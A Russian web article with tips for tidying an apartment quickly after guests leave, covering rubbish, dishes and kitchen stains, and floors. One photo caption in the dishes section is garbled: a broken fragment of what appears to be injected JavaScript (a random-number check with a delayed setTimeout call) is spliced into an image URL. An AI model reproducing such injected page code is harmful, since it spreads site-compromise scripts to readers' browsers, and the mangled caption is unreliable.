Добавить в закладки

Как быстро убраться в квартире после прихода гостей

Встреча гостей всегда связана с хлопотами по готовке и уборке. А потом дружное и веселое застолье, окончанием которого снова является уборка. Обычно гости приходят вечером, а уходят поздним вечером, когда уже хочется спать, и на уборку совсем мало времени. А на столе вас ждет гора посуды. Да и комнату, желательно, прибрать и подмести.  Разберемся со всем поэтапно.

Приход гостей – всегда волнительное событие.

Приход гостей – всегда волнительное событие. Фото: mir24.tv

Мусор

Первым делом возьмите плотный пакет и соберите все бутылки, пластиковую посуду, упаковки от десертов и пр. Не обязательно их срочно выносить, это можно сделать утром, по дороге на работу или просто, чтобы не ходить по темноте. И конечно же во время дальнейшей уборки найдется что еще докинуть в этот пакет.

Соберите весь мусор и поставьте в прихожей, чтобы не забыть его вынести по пути на работу.

Соберите весь мусор и поставьте в прихожей, чтобы не забыть его вынести по пути на работу. Фото: remstroiblog.ru

Посуда и кухня

Отнесите всю посуду на кухню, чтобы разобрать стол и вернуть всю мебель на свои места. Это визуально разгромоздит комнату.

Не спешите сразу приступать к мытью посуды, сначала оцените масштабы трагедии в пределах всей кухни. Возможно, перед самым приходом гостей у вас что-то убежало на плите. Если такие «трудные» пятна есть, то нанесите на них моющее средство и дайте этому средству поработать. Как раз в это время стоит приступить к мытью посуды.

Самая большая часть уборки – мытье посуды, если у вас она не одноразовая.

Самая большая часть уборки – мытье посуды, если у вас она не одноразовая. Фото: andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and.com/static/u/content_image_from_text/02072017/5898511-2211683.jpg»>newslandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and.com

Полы

Мытье полов можно отложить на следующий день, но убрать более крупный мусор стоит все-таки сразу. Если у вас постелен палас, ковер или ковролин, то лучше немного пошуметь пылесосом. При обнаружении пятен, следует провести процедуру обработки как можно быстрее, чтобы пятно не успело въесться и испортить вид комнаты. В случае других напольных покрытий будет достаточно смести мусор веником.

Если вы не сильно суеверный человек, стоит придать полам чистоту, после ухода гостей.

Если вы не сильно суеверный человек, стоит придать полам чистоту, после ухода гостей. Фото: ic.pics.livejournal.com

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Опубликовано: 26.10.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: